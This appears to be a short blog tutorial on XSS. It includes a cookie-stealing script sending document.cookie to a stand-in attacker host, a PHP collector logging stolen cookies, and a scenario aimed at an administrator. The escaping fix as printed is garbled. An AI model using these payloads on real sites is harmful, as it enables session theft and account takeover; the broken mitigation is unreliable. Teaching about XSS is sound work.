Injection ---
is one of the oldest vulnerability that can lead to data loss, data theft,
service denial, etc and in worst scenario can compromise the full system.
Injection attacks, especially SQL Injections (SQLi attacks) and Cross-site Scripting (XSS),
are most dangerous and widespread weakness of any application.
Other than these, there are several other types of Injections that a web developer should look out for.
Using a safe API and positive server-side input validation can help in preventing Injections.
------------------------------------------------------------------------------------------
<SCRIPT></SCRIPT> <-well-used tag of XSS.
------------------------------------------------------------------------------------------
<Example of the process; how to find if the system has XSS vulnerability>
* You can use an email service that contains short script that opens the pop-up page 'xss!' alert when opened.
receiver: (ex) (victim) (hacker@hacker.com)
sender: (me)
body: <script>alert('XSS!');</script>
(When the server or system has a XSS vulnerability,
the pop-up page will be opened when the email is opened by victim(receiver))
once hacker found if the target system has a vulnerability,
now they can send a malicious script to victims and
'can try to snatch cookie Information from victims.'
------------------------------------------------------------------------------------------
Example: Sending cookie Information of client to the
C2 server (http://hacker.example.com)
------------------------------------------------------------------------------------------
<script>window.location = 'http://hacker.example.com/xss.php?log=' + document.cookie</script>
------------------------------------------------------------------------------------------
This script is to take Information about this page into the cookie,
taking those to the log parameter of the C&C server.
(http://hacker.example.com/xss.php)
------------------------------------------------------------------------------------------
<?
$fp = fopen("log.txt", "a+");
fwrite($fp,$_GET['log']);
fclose($fp);
?>
------------------------------------------------------------------------------------------
Example above: is a file that takes the source log parameter of the xss.php file
from the C&C server, and then write it to log.txt.
When the XSS script started, it'll send cookie Information to the log parameter of xss.php file, and then PHP script will take cookie Information and save it as a file.
(and of course, it'll be readable to anyone :/)
now, hacker can snatch the administrator account credential by using this Info.
-> Send the script(below) to the administrator (who has an admin credential).
<script>
window.slocation='http://example.com/xss.php?log=' + document.cookie
</script>
-> The administrator opens the malicious email.
-> When he/she checks the email, by the script included,
cookie Information will be sent to the C&C server.
-> Cookie Information will be saved (log.txt) in the hacker's home.
Solution:
(example)
* Replace '<', and '>' to '<' and '>' so the tag will be blocked.
- However, most of notice board of web pages just allows clamp mark so it has be go through quite complicate filtering process.
- It has numerous attack points so there is no such perfect defense solution for XSS.
Facebook and Google have their own Bug Bounty system for white hackers to find XSS vulnerability point of their own system and they urge to pay minimum $500~ maximum million dollars when someone finds it.
(reference)
https://www.facebook.com/whitehat/
http://www.google.com/about/appsecurity/reward-program/
done!
Comments
Post a Comment